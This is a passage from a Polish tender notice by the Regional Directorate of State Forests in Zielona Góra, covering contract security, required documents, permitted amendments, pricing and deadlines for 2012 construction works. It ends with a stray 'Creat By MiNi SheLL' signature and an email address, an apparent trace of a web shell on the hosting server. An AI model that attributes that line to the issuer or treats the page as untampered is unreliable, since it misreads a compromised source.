    Zamawiającego (Nadleśnictwa): BP Lubsko 63 1020 5460 0000 5002 0042 2105
5. Zamawiający zwróci zabezpieczenie należytego wykonania umowy w terminie i na warunkach określonych we wzorze umowy.
6. Zabezpieczenie należytego wykonania umowy służy pokryciu roszczeń z tytułu niewykonania
    umowy lub nienależytego wykonania umowy.
    Ponadto  zgodnie z:
1)	art. 471 Kc (Odpowiedzialność odszkodowawcza dłużnika); Wykonawca obowiązany jest do zapłaty odszkodowania z tytułu niewykonania lub nienależytego wykonania umowy, 
2)	art. 491 § 1 K.c.,  Wykonawca obowiązany jest do zapłaty odszkodowania z tytułu zwłoki w wykonaniu umowy wzajemnej, odszkodowania z tytułu niemożności świadczenia, za którą Wykonawca ponosi odpowiedzialność (art. 493 § 1 K.c.), 
3)	art. 493 § 1 K.c., Wykonawca obowiązany jest do zapłaty odszkodowania z tytułu szkody wynikłej z niewykonania zobowiązania z umowy wzajemnej 
4)	art. 494 K.c., odszkodowania z tytułu szkody wynikłej z niewykonania lub nienależytego wykonania zobowiązania z umowy wzajemnej.
7. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty zabezpieczenia w przypadku wystąpienia okoliczności, o których mowa powyżej w ust. 6.
2.	W przypadku, gdy do realizacji zamówienia zostanie wybrana oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed podpisaniem umowy, Wykonawcy zobowiązani będą do przedłożenia RDLP umowy regulującej współpracę między nimi. 
3.	Ponadto Wykonawca przedstawi następujące dokumenty:
3.1	Dokumenty potwierdzające posiadanie przez osoby wskazane w ofercie odpowiedzialne za kierowanie robotami budowlanymi uprawnień do wykonywania samodzielnych funkcji technicznych w budownictwie przez osobę, która będzie kierować robotami budowlanymi będącymi przedmiotem zamówienia;
3.2	W sytuacji, gdy Wykonawca prowadzi działalność gospodarczą, jako osoba fizyczna i podlega wpisowi do ewidencji działalności gospodarczej aktualne zaświadczenie o wpisie do tejże ewidencji wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; lub wydruk ze strony internetowej CEIDG www.firma.gov.pl podpisany przez Wykonawcę.
         3.3  decyzję właściwego organu zatwierdzającą program gospodarki odpadami, o której mowa w art.   17 ust. 1a w powiązaniu z art. 21a ustawy z dnia 27.04.2001 r. o odpadach (tekst jednolity: Dz.U.10.185.1243 z późn. zmianami).             
4.	Wykonawca przed zawarciem umowy będzie zobowiązany do wniesienia zabezpieczenia należytego wykonania umowy o którym mowa w Dziale XXV SIWZ.
5.	 Wykonawca przed zawarciem umowy będzie zobowiązany do przedłożenia RDLP ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 1 000 000,00 zł. W przypadku gdyby okres ubezpieczenia był krótszy niż okres trwania umowy, Wykonawca zobowiązany jest do przedłużenia okresu obowiązywania polisy
 i złożenia Zamawiającemu oświadczenia w przedmiotowej sprawie.
Wykonawca dostarczy RDLP przedmiotową polisę wraz z pełną treścią wszystkich warunków. 
Przez cały okres realizacji zamówienia objętego przedmiotem postępowania Wykonawca zobowiązany jest odnawiać ww. polisę na ww. określonych warunkach. Wykonawca dostarczy Zamawiającemu przedmiotową polisę wraz z pełną treścią wszystkich warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający  mając na uwadze postanowienia art. 144 ust. 1 ustawy Pzp, dopuszcza możliwość zmian zawartej umowy w szczególności, w następujących okolicznościach:
1.1	terminów wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy tj. np. udzielenie zamówień dodatkowych, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego lub wystąpienie siły wyższej, której wystąpienie ma wpływ na realizację umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Termin siła wyższa oznacza akty terroru, wojny wypowiedziane i niewypowiedziane, blokady, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi, powodzie, wybuchy
 i inne podobne nieprzewidywalne zdarzenia poza kontrola którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec.
1.2	zakresu przedmiotu umowy lub sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany (w tym skutkami finansowymi), przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. 
1.2.1	zaistnienie warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy;
1.2.2	wydaniem decyzji administracyjnej przez właściwy organ wyłączającej lub ograniczającej przedmiot zamówienia opisany w dokumentacji projektowej;
1.2.3	rozbieżnościami lub niejasnościami w rozumieniu pojęć użytych w Umowie, których nie można było usunąć w inny sposób a zmiana taka będzie umożliwiać usunięcie rozbieżności 
i doprecyzowanie Umowy w celu jednoznacznej interpretacji
           Uwaga! Zmiana nie może prowadzić do rozszerzenia przedmiotu Umowy.
1.3	regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany,
1.4	formy zabezpieczenia należytego wykonania umowy,
1.5	oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy,
1.6	konieczność zmiany osób, o których mowa w §7 umowy.
1.7	Wystąpi konieczność: zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.

2.	W trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia, niemożliwy do zauważenia przez Wykonawców w postępowaniu poprzedzającym wybór najkorzystniejszej oferty.
3.	Z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą (art. 3571 Kc).
4.	Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia, w tym zmiana stawki VAT) bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).
5.	 Wystąpi korzystna dla Zamawiającego redukcja przedmiotu zamówienia, związana z koniecznością udzielenia zamówień uzupełniających lub dodatkowych.
6.	 Wystąpi korzystna dla Zamawiającego redukcja robót objętych zamówieniem, związana z wykonaniem robót zamiennych lub wykonanie robót dodatkowych bez redukcji robót. 
7.	Wystąpi zmiana Wykonawcy w przypadkach sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek).
7.	Wystąpi konieczność: zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.
8.	Wystąpi konieczność zmiany terminów umownych rozpoczęcia bądź zakończenia umowy z uwagi na: panujące warunki atmosferyczne, konieczność usunięcia błędów lub wprowadzenia zmian 
w dokumentacji technicznej lub specyfikacji technicznej wykonania i odbioru robót, odmienne od przyjętych w dokumentacji projektowej warunki geologiczne lub udzielenie zamówień dodatkowych, przedłużająca się procedurę przetargową  pt. Wykonanie rozpoznania i oczyszczania saperskiego, które warunkuje przystąpienie Wykonawcy do realizacji przedmiotowego zadania. 
9.	Wystąpi konieczność zmiany terminu przewidzianego na rozpoczęcie lub zakończenie robót spowodowana: warunkami atmosferycznym, zmianami spowodowanymi nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowym, w szczególności: niewypały
 i niewybuchy; wykopaliska archeologiczne.
10.	Wystąpi skrócenie terminu wykonania przedmiotu umowy korzystne dla Zamawiającego, w związku, 
z czym Zamawiający dopuszcza wcześniejszą zapłatę na wykonanie robót budowlanych.
11.	Wystąpi konieczność zmiany terminu zakończenia robót na skutek odmiennie przyjętych 
w dokumentacji projektowej warunków terenowych, w szczególności istnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych.
12.	Wystąpi konieczność zmiany terminu zakończenia robót w następstwie okoliczności leżących po stronie Zamawiającego, a w szczególności: wstrzymania robót przez Zamawiającego, konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub szczegółowej specyfikacji technicznej, odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tym odmowy udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji.
13.	 W wyniku urzędowej zmiany stawki podatku VAT.  Należny podatek VAT naliczony zostanie do ceny netto w fakturze wg stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku.
14.	Zaistnieją warunki ustalenia wcześniejszego terminu zakończenia, rozliczenia umowy i wystawienia faktury końcowej w przypadku wcześniejszego wykonania robót objętych umową.
15.	Wystąpi konieczność zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
16.	W razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy.
27.	Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych
 w szczególności następującymi okolicznościami:
18.1 niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowania zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
18.2 pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
18.3 pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
18.4 konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.
19.   W razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy.
 20.  Wystąpi potrzeba zmian na podstawie art. 23 pkt 1 ustawy Prawo budowlane w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy.
 21.     Wystąpi potrzeba zmian na podstawie art. 20 ust. 1 pkt 4 lit. a) ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych (roboty zamienne) w stosunku do przewidzianych
 w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.
22.  Gdy zmiany dokonane zostały podczas wykonania robót i nie odstępują w sposób istotnych od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36 a ust. 5 ustawy Prawo budowlane i dokonane zostały zgodnie z zapisami art. 36 a ust. 6 ustawy Prawo budowlane, spełniając wymogi art. 57 ust. 2 ustawy Prawo budowlane.
    23. Warunkiem podpisania aneksu na przedłużony termin wykonania będzie zachowanie ciągłości zabezpieczenia, bez zmniejszenia jego wysokości oraz przedłużenie polisy ubezpieczeniowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNA DYREKCJA LASÓW PAŃSTWOWYCH
 w Zielonej Górz
ul.  Kazimierza Wielkiego 24a 
65-950 Zielona Góra
Koszt SIWZ wynosi 100,00 zł plus koszt przesyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 09:00, miejsce: Regionalna Dyrekcja Lasów Państwowych 
 w Zielonej Górze, ul. Kazimierz Wielkiego 24a
65-950 Zielona Góra

Sekretariat Dyrektora IV piętro
nie później niż do dnia 20.06.2012 roku do godz. 9:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Cena podana w ofercie powinna zawierać wszystkie koszty związane z realizacją przedmiotu zamówienia.
2.	Cena oferty ma stanowić kwotę wynagrodzenia ryczałtowego, obejmująca każdy obiekt zainwentaryzowany, o którym mowa w załączniku nr 1 do SIWZ, jaką Wykonawca chce uzyskać za wykonanie całego przedmiotu zamówienia. Oznacza to, że Wykonawca przygotowując ofertę, oprócz robót i prac wynikających z dokumentacji projektowej, i projektu umowy powinien przewidzieć wszystkie koszty i okoliczności, które towarzyszą lub mogą towarzyszyć wykonaniu tego zamówienia 
i które są konieczne dla prawidłowej realizacji tego zamówienia. Cena oferty stanowi sumę wynagrodzeń ryczałtowych wszystkich zainwentaryzowanych obiektów (251 szt.).
3.	Odpowiednie zagospodarowanie odpadów, należy do obowiązku Wykonawcy. Odpady muszą być zagospodarowane zgodnie z obowiązującymi przepisami ochrony środowiska. Wykonawca robót budowlanych powinien uwzględnić w ofercie (wycenie robót budowlanych) potencjalne zyski wynikające z pozyskania i odsprzedaży odpadów użytkowych (nadających się do recyklingu).
4.	Cenę oferty należy podać brutto z uwzględnieniem podatku od towarów i usług (VAT). 
5.	Ceny należy podać w złotych polskich z dokładnością do dwóch miejsc po przecinku.
6.	RDLP nie przewiduje rozliczeń w walutach obcych.
7.	Jeżeli zostanie złożona oferta, której wybór prowadziłby do obowiązku podatkowego RDLP zgodnie 
z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, RDLP w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami. 
8.	RDLP w celu ustalenia czy oferta zawiera rażąco niską ceną w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny.
9.	RDLP odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
10.	Cena ofertowa musi zawierać wszystkie koszty związane z realizacją zadania wynikające 
z dokumentacji projektowej jak również koszty wszelkich robót przygotowawczych, odtworzeniowych, porządkowych, zagospodarowania budowy, utrzymania zaplecza budowy, pełnej obsługi geodezyjnej oraz inne koszty wynikające z SIWZ oraz umowy.
11.	Cenę należy określić w PLN (zł). 
12.	Rozliczenia między Zamawiającym i Wykonawcą prowadzone będą w PLN (zł).
13.	Zamawiający nie dopuszcza możliwości prowadzenia rozliczeń w walutach obcych.
14.	Cena określona przez Wykonawcę w ofercie będzie ceną ryczałtową. Oferowana cena powinna uwzględniać przewidywaną inflację. Cena oferty stanowi sumę wynagrodzeń ryczałtowych wszystkich zainwentaryzowanych obiektów (251 szt.)
     Cena musi zawierać wszelkie składowe niezbędne do prawidłowej realizacji zamówienia realizacji zamówienia, czyli pełen zakres robót objętych wymaganiami zawartymi 
w niniejszej specyfikacji i innymi warunkami, w tym również: 
a)	koszt wykonania robót, w tym: materiały, sprzęt, robocizna,
b)	narzuty i dodatki dla Wykonawcy,
c)	koszt pełnienia funkcji kierownika budowy,
d)	koszty transportu, montażu i dostaw,
e)	pełen zakres robót objętych projektem i innymi warunkami i wymaganiami zawartymi w niniejszej specyfikacji,
f)	koszty robót przygotowawczych, porządkowych i odtworzeniowych,
g)	koszty wywozu i utylizacji gruzu, ziemi i innych odpadów z zastrzeżeniem pkt 3,
h)	koszty odbiorów, uzyskania decyzji, pozwoleń i uzgodnień,
i)	ewentualne koszty zajęcia terenów nie będących własnością Zamawiającego na czas wykonywania robót,
j)	koszty wykonania dokumentacji powykonawczej,
k)	koszty wykonania wszelkich wymaganych i niezbędnych pomiarów,
l)	koszty opracowania planu BIOZ,
m)	koszty wykonania wszelkich prac i robót opisanych w niniejszej SIWZ wraz
 z załącznikami,
n)	koszty mediów na czas robót,
o)	podatek VAT,
p)	inne koszty niezbędne do wykonania przedmiotu zamówienia.


KRYTERIA OCENY OFERT ORAZ ICH ZNACZENIE ORAZ SPOSÓB OCENY OFERT
1.	Kryteria oceny ofert i ich znaczenie:
Cena 100%
2.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą ilością punktów.
3.	Oferta najkorzystniejsza (z najniższą ceną) otrzyma 100 pkt., każda następna oferta otrzyma liczbę punktów proporcjonalnie mniejszą 4.	Jeżeli nie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, RDLP wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez niego ofert dodatkowych. Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.
OFERTY CZĘŚCIOWE, WARIANTOWE 
1.	Wykonawca może złożyć jedną ofertę.  
2.	RDLP nie dopuszcza składania ofert wariantowych
      3.   Zamawiający nie dopuszcza składania ofert częściowych
TERMIN WYKONANIA ZAMÓWIENIA
Termin wykonania zamówienia określa się następująco - od 01.10.12 r. do 31.12.2012 r. 
RDLP informuje, iż jest w trakcie przeprowadzania postępowania przetargowego pt. Wykonanie rozpoznania i oczyszczania saperskiego. Zamawiający planuje podpisanie umowy z Wykonawcą na rozpoznacie i oczyszczanie saperskie w lipcu 2012 r. Termin zakończenia planowany jest w III kwartale 2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com